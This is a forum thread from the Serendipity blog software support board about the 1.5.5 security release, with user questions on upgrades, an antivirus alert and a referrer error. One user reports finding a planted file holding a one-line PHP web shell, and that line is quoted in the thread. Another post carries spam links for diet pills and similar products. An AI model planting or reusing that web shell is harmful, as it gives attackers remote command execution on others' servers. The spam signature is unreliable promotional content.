Serendipity 1.5.5 released: IMPORTANT Security Fix

Post Reply
User avatar
garvinhicking
Core Developer
Posts: 30014
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:

Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking » Wed Dec 22, 2010 12:36 am

Hi!

Serendipity 1.5.5 has been released to address a serious security issue. Please read http://blog.s9y.org/archives/224-Import ... eased.html

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/

ellisse
Regular
Posts: 5
Joined: Fri Aug 18, 2006 10:08 am
Location: Italy
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by ellisse » Tue Dec 28, 2010 1:38 pm

Hi...I'm sorry, but I've found a virus named Obfuscated in plugins\QuickTag\tag-lib.js (AVG Antivirus). Can I safely upgrade serendipity 1.5.5 after the virus elimination?
Thanks
e.

User avatar
garvinhicking
Core Developer
Posts: 30014
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking » Wed Dec 29, 2010 1:44 pm

Hi!

tag-lib.js uses javascript encryption to make the size smaller; this is called "compression". Even though some trojans use this technique, it does not inherently mean a security issue. In this case, the tag-lib.js file does not contain any trojan and is meant to be that way.

If you still feel uncomfortable, you can of course delete that file - it is only required for a specific feature of the Xinha WYSIWYG editing component ("QuickTags").

HTH,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/

peacekeeper
Regular
Posts: 13
Joined: Sat Feb 07, 2009 1:54 pm
Location: DE
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by peacekeeper » Wed Dec 29, 2010 3:25 pm

Hi,
after I updates S9Y to Version 1.5.5 I cannot create new entrys. I have got the following error alert "Ihr Browser hat keinen gültigen HTTP-Referrer übermittelt. Dies kann entweder daher kommen, dass Ihr Browser/Proxy nicht korrekt konfiguriert ist, oder dass Sie Opfer einer "Cross Site Request Forgery (XSRF)" waren, mit der man Sie zu ungewollten Änderungen zwingen wollte. Die angeforderte Aktion konnte daher nicht durchgeführt werden."

I updated 3 Blogs of my blogs. It´s the same problem on each blog. I tested it on Internet Explorer 8 Firefox and Chrome! Same problem! :-(

User avatar
garvinhicking
Core Developer
Posts: 30014
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking » Fri Dec 31, 2010 4:38 pm

Hi!

From which version did you upgrade from? Did you change anything in your PHP installation and/or .htaccess?

The error usually only happens if the PHP sessions mismatch, or your browser does not submit a "HTTP Referer" string. Also make sure you use the blog domain name to login that is configured inside s9y as the HTTP host.

HTH,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/

bryzo
Posts: 0
Joined: Sun Jan 02, 2011 11:22 pm

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by bryzo » Mon Jan 03, 2011 12:45 am

I downloaded 1.5.5 LITE yesterday. Is that download already patched? Or do I need to patch it?

User avatar
Don Chambers
Regular
Posts: 3617
Joined: Mon Feb 13, 2006 3:40 am
Location: Chicago, IL, USA
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by Don Chambers » Mon Jan 03, 2011 3:13 am

the lite version should also be the upgraded version.

Maccsta
Regular
Posts: 77
Joined: Mon Feb 19, 2007 7:07 am
Location: Leeds, England

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by Maccsta » Fri Jan 14, 2011 9:32 pm

I haven't updated some of my blogs for years! Better do this one then!
Check out this blog today!
Buy Eye Secrets strips.
Best devices reviewed at http://www.penisstretchers.org/.
Order Capsiplex slimming pills today.
Buy Meratol diet pills online.

david@mediacopy
Regular
Posts: 56
Joined: Sun May 18, 2008 5:50 pm

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by david@mediacopy » Tue Jan 25, 2011 3:17 pm

I've just installed the new version. While checking I found a file called

1.php.png

containing the line <?PHP system($_GET['cmd']); ?>

Looking at the logfile for the site, it had been accessed and they were looking for 1.php.jpg and 2.php.jpg

VideoRob
Regular
Posts: 21
Joined: Fri Feb 01, 2008 7:11 am

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by VideoRob » Wed Feb 23, 2011 5:58 am

Looks like I should update. I have over 50 blogs that I haved updated in years.

Post Reply